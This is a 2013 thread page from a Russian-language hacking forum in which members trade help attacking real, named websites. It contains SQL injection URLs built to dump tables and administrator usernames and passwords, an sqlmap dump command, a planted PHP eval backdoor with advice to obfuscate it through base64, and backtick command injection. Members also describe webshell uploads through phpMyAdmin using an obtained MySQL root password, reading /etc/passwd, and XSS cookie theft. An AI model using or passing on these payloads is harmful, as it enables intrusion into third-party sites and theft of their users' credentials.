HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22191  
Старый 10.03.2013, 07:48
WendM
Guest
Сообщений: n/a
Провел на форуме:
11466

Репутация: 3
По умолчанию

Цитата:
Сообщение от HeaVeNSeR  
HeaVeNSeR said:
не совсем понял...)
как,к примеру,вывести результат system('ls -la')?
(экранируются кавычки и режутся заглавные)
Такая кавычка тоже режится ?

Цитата:
Сообщение от None  
`
Как насчет

Цитата:
Сообщение от None  
%27
или

Цитата:
Сообщение от None  
%60
?
 
Ответить с цитированием

  #22192  
Старый 10.03.2013, 19:50
HeaVeNSeR
Новичок
Регистрация: 03.12.2008
Сообщений: 5
Провел на форуме:
597696

Репутация: 1
Отправить сообщение для HeaVeNSeR с помощью ICQ
По умолчанию

Цитата:
Сообщение от WendM  
WendM said:
Такая кавычка тоже режится ?
Как насчет или ?
такая кавычка не режется, print(`ls -la`) сработало...но теперь похоже режутся слэши...ни ls ../,ни ls ..\ не срабатывает...соотв-но,залиться тоже не получается...

есть ещё варианты?
 
Ответить с цитированием

  #22193  
Старый 11.03.2013, 02:10
Zahar
Новичок
Регистрация: 17.03.2008
Сообщений: 5
Провел на форуме:
168509

Репутация: 1
По умолчанию

help

Парни, хелп!

Код:
Code:
_ttp://www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473%20UNION%20ALL%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT%280x7e,version%28%29,0x7e%29,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--%20&tipo=auto
Не получается продвинуть далее.
 
Ответить с цитированием

  #22194  
Старый 11.03.2013, 06:34
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Цитата:
Сообщение от Zahar  
Zahar said:
Парни, хелп!
Код:
Code:
_ttp://www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473%20UNION%20ALL%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT%280x7e,version%28%29,0x7e%29,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--%20&tipo=auto
Не получается продвинуть далее.
Код:
Code:
www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,  86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156+from+information_schema.tables+where+table_schema=0x706f7274616c636c7562+limit+0,1--+-&tipo=auto
 
Ответить с цитированием

  #22195  
Старый 11.03.2013, 16:24
Boombilka
Guest
Сообщений: n/a
Провел на форуме:
7702

Репутация: 0
По умолчанию

Есть булковский форум, прописал в faq_complite eval($_GET[e]);.

Вроде бы все хорошо, пхп инфо выводиться, но вот только:

Код:
Code:
allow_url_include Off
allow_url_fopen   Off
Интересует, как заливаться в данной непростой ситуации? До этого пробывал вгетом лить в tmp, вроде бы все залилось, только вот site.com/tmp/shell.php не открывается, и выдает 404 ошибку. И да, на всех папках стоят права nobody(мб это как-то влияет?).

Заранее спасибо
 
Ответить с цитированием

  #22196  
Старый 11.03.2013, 16:45
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от Boombilka  
Boombilka said:
Есть булковский форум, прописал в faq_complite eval($_GET[e]);.
Вроде бы все хорошо, пхп инфо выводиться, но вот только:
Код:
Code:
allow_url_include Off
allow_url_fopen   Off
Интересует, как заливаться в данной непростой ситуации? До этого пробывал вгетом лить в tmp, вроде бы все залилось, только вот site.com/tmp/shell.php не открывается, и выдает 404 ошибку. И да, на всех папках стоят права nobody(мб это как-то влияет?).
Заранее спасибо
пропиши eval(base64_decode($_GET[e]));

и юзай курл
 
Ответить с цитированием

  #22197  
Старый 11.03.2013, 19:59
exstreme
Guest
Сообщений: n/a
Провел на форуме:
3581

Репутация: 0
По умолчанию

Привет всем!

Помогите пожалуйста разобраться с XSS-уязвимостями. Не совсем понятно, как использовать их, чтобы к примеру получить чужие cookies, а не свои.

Что делать с такого вида уязвимостями?

Код:
Code:
URL encoded POST input poll%5Btitle%5D was set to '"()&%1prompt(911011)
или

Код:
Code:
URL encoded POST input character%5bdescription%5d was set to 1
The input is reflected inside a text element.
Также интересует уязвимости типа "HTML form without CSRF protection" можно использовать для подмены данных или не только?
 
Ответить с цитированием

  #22198  
Старый 11.03.2013, 20:25
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

Сообственно впервые столкнулся с такой проблемой)

Вообщем через скуль добыл пасс от рута мускула , на сайте есть phpmyadmin

Сообственно пытался залить шелл через пхпмуадмин и столкнулся с такой проблемой

а именно с определение пути к сайту

например мой сайт называется sqlinject.com

sqlinject.com/news.php?id=1'

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhost/sql.com/news.php on line 63

так же в корне присувствует файл phpinfo в котором путь так же прописан таким образом /var/www/vhost/sql.com/phpinfo.php

Решил посмотреть сайты на одном ип в итоге получил список из 50+ сайтов... попробовал просканить эти сайты на директории и файлы оказалось что в каждом сайте присувствуют такие файлы config.php, connect.php, phpinfo.php и еще куча файлов. вообщем файлы одни и теже на каждом сайте... это я клоню к тому что файлы эти посути лежат в одной директории, но контент на сайтах разный совершенно...

в файле phpinfo.php на каждом сайте один и тот же путь) "/var/www/vhost/sql.com/phpinfo.php"

Пробовал прочитать файл через LOAD_FILE например phpinfo с пути написанного выше) не читает... хотя /etc/passwd читает)

Чисто для читалки попробовал залить минишелл через пхпмуадмин в /tmp/

Шелл залился и прочитался через LOAD_FILE

Сообственно интересует вопрос возможно ли как-то получить настоящий путь к сайту sqlinject.com, что бы залится)

Мб есть у кого какие нить соображения по этому поводу?)

Есть папочка icons от апача) но она походу не доступна для записи) да и путь искать надо)

Если есть у кого желание помочь и поломать голову)) могу предоставить root;pass к phpmyadmin ))
 
Ответить с цитированием

  #22199  
Старый 12.03.2013, 05:53
jestkokos
Guest
Сообщений: n/a
Провел на форуме:
435

Репутация: 0
По умолчанию

http://bkwar.ru/news/?topic=494 Протестил через Хавиж (ну первонюбские примычки) Скюля методом стринг. Хавиж выводит Бд всё нормально таблицы и так далее...

Ихнее http://bkwar.ru/www/labirint3/ulldie.php Пхпинфо

ИСП мэнэджер тут https://bkwar.ru:1500/

Ещё БД тут http://bkwar.ru/pgadmin/

Открытые порты сканеные через нмап : 110 , 143, 1500 , 21 ,22 , 443 , 4444 ,5000 ,53 , 993 ,995 ну и соотвественно 80.

Что нашёл webshag Напишу более подозрительные

/robots.txt found. It might be interesting to have a look inside.

/bin/ Directory indexing is enabled: CGI directory

/bin/ This might be interesting... possibly a system shell found.

/webmail/src/read_body.php This might be interesting... has been seen in web logs from an unknown scanner.

Ну есть ещё уйма директорий ...

А да сканер Дирбустер показал это : http://bkwar.ru/myadmin/setup/index.php

Пробовал разные варианты прочитанные и не прочитанные. А у них отключенно выползание ерророк (тут и ступор).

Недельки две мучаюсь. может подскажите как как всё это преодолеть и вынести результат в браузер.

Прошу прощение если не туда всунул вопрос. Ещё не освоился у вас...
 
Ответить с цитированием

  #22200  
Старый 12.03.2013, 14:36
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

нужно вывести username,password при помощи sqlmap, где usertype=Administrator

http://blindcanadians.ca/press_releases/index.php?BriefID=50+union+select+concat_ws(0x3a,u sername,password)+from+users+where+usertype='Admin istratot'+--+

так дампится вся база, как сделать так, чтобы выводился только Administrator?

sqlmap -u "http://blindcanadians.ca/press_releases/index.php?BriefID=50" --dump -T users -v 1
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ